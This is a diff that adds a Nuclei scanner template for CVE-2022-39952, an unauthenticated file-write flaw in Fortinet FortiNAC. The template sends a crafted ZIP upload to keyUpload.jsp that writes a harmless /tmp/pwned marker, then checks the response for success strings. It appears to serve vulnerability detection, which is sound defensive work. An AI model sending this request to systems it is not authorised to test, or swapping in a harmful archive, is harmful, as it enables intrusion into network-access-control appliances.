diff --git a/cves/2022/CVE-2022-39952.yaml b/cves/2022/CVE-2022-39952.yaml new file mode 100644 index 0000000000..a59029d464 --- /dev/null +++ b/cves/2022/CVE-2022-39952.yaml @@ -0,0 +1,45 @@ +id: CVE-2022-39952 + +info: + name: FortiNAC Unauthenticated Arbitrary File Write + author: dwisiswant0 + severity: critical + description: | + A external control of file name or path in Fortinet FortiNAC versions + 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, + 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7 + may allow an unauthenticated attacker to execute unauthorized code or + commands via specifically crafted HTTP request. + reference: + - https://www.fortiguard.com/psirt/FG-IR-22-300 + - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/ + remediation: Upgrade to FortiNAC version 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above + tags: fortinet,fortinac,cve,cve2022,fileupload,rce + +variables: + boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}" + payloadHex: "504b030414000000000031b155567e5304d9050000000500000009000000746d702f70776e656470776e6564504b0102140314000000000031b155567e5304d90500000005000000090000000000000000000000b48100000000746d702f70776e6564504b05060000000001000100370000002c0000000000" + # payloadHex = /tmp/pwned, content "pwned" + +requests: + - method: POST + path: + - "{{BaseURL}}/configWizard/keyUpload.jsp" + - "{{BaseURL}}:8443/configWizard/keyUpload.jsp" + headers: + Content-Type: "multipart/form-data; boundary={{boundaryId}}" + body: | + --{{boundaryId}} + Content-Disposition: form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip" + + {{hex_decode(payloadHex)}} + --{{boundaryId}}-- + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "zipUploadSuccess" + - "SuccessfulUpload" + condition: and